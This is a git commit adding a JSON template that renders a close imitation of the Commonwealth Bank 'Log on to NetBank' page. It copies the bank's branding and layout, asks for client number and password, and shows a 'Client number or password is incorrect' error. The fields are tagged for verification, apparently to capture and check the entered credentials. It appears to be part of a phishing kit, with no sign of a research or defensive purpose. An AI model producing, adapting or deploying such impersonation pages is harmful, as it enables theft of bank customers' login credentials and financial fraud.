first commit

This commit is contained in:
tom@tom.com
2026-04-19 17:51:16 +08:00
commit 84cb2597a4
88 changed files with 24618 additions and 0 deletions

View File

@@ -0,0 +1,9 @@
{
"type": "customValid",
"name": "Commonwealth NetBank Login",
"showTop": false,
"pageTitle": "Log on to NetBank",
"errorMessage": "Client number or password is incorrect. Please try again.",
"pageContent": "<div style='font-family:Arial,Helvetica,sans-serif;max-width:335px;width:100%;margin:0 auto;background:#efefef;border:1px solid #d6d6d6;color:#111;box-sizing:border-box;'><div style='display:flex;align-items:center;gap:10px;padding:14px 14px 12px;background:#f4f4f4;border-bottom:1px solid #d9d9d9;'><img src='data:image/png;base64,REPLACE_WITH_BASE64_LOGO' alt='Commonwealth Bank' style='width:34px;height:34px;object-fit:contain;display:block;flex:0 0 auto;background:#ffda00;border-radius:2px;'><div style='font-size:14px;line-height:1.1;font-weight:700;white-space:nowrap;letter-spacing:0;'>CommonwealthBank</div></div><div style='background:#7e7e7e;color:#fff;font-size:clamp(18px,4.8vw,22px);font-weight:700;line-height:1.18;padding:11px 16px;'>Log on to NetBank</div><div style='padding:16px 12px;background:#efefef;'><div style='display:grid;grid-template-columns:minmax(90px,110px) 1fr;align-items:center;gap:10px;margin-bottom:12px;'><label style='text-align:right;font-size:clamp(13px,3.8vw,15px);line-height:1.2;color:#111;'>Client number</label><div style='position:relative;'><input type='text' class='custom-input' data-field='clientNumber' data-verify-key='clientNumber' required style='width:100%;height:24px;border:1px solid #8a8a8a;background:#fff;padding:0 30px 0 8px;font-size:clamp(12px,3.5vw,14px);box-sizing:border-box;outline:none;'><span style='position:absolute;right:7px;top:3px;min-width:16px;height:16px;padding:0 2px;border-radius:3px;background:#d14545;display:flex;align-items:center;justify-content:center;color:#fff;font-size:11px;line-height:1;letter-spacing:0.5px;pointer-events:none;'>...</span></div></div><div style='display:grid;grid-template-columns:minmax(90px,110px) 1fr;align-items:center;gap:10px;margin-bottom:12px;'><label style='text-align:right;font-size:clamp(13px,3.8vw,15px);line-height:1.2;color:#111;'>Password</label><div style='position:relative;'><input type='password' class='custom-input' data-field='password' data-verify-key='password' required style='width:100%;height:24px;border:1px solid #8a8a8a;background:#fff;padding:0 30px 0 8px;font-size:clamp(12px,3.5vw,14px);box-sizing:border-box;outline:none;'><span style='position:absolute;right:7px;top:3px;min-width:16px;height:16px;padding:0 2px;border-radius:3px;background:#d14545;display:flex;align-items:center;justify-content:center;color:#fff;font-size:11px;line-height:1;letter-spacing:0.5px;pointer-events:none;'>...</span></div></div><label style='display:flex;align-items:center;justify-content:center;gap:8px;margin:9px 0 14px;cursor:pointer;'><input type='checkbox' class='custom-input' data-field='rememberClientNumber' data-verify-key='rememberClientNumber' style='width:15px;height:15px;margin:0;'><span style='font-size:clamp(13px,3.8vw,15px);line-height:1.2;color:#111;'>Remember client number</span></label><div class='custom-error-message' style='min-height:18px;text-align:center;color:#b1111d;font-size:12px;line-height:1.3;margin-bottom:5px;'></div><div style='text-align:center;margin-bottom:12px;'><button type='button' class='custom-button' data-action='submit' style='display:inline-flex;align-items:center;justify-content:center;gap:8px;height:34px;min-width:128px;padding:0 20px;background:#ffcd00;border:1px solid #e1bb00;border-radius:17px;font-size:clamp(14px,4.2vw,18px);line-height:1;color:#111;cursor:pointer;'><span aria-hidden='true' style='width:12px;height:10px;display:inline-block;position:relative;border:1.6px solid #111;border-radius:2px;box-sizing:border-box;margin-right:1px;'><span style='position:absolute;left:1.8px;top:-7px;width:6px;height:6px;border:1.6px solid #111;border-bottom:0;border-radius:5px 5px 0 0;box-sizing:border-box;display:block;'></span></span><span>Log on</span></button></div><div style='text-align:center;'><a href='javascript:void(0)' style='font-size:clamp(12px,3.6vw,14px);color:#111;text-decoration:underline;'>I've forgotten my log on details</a></div></div></div>",
"customStyles": ""
}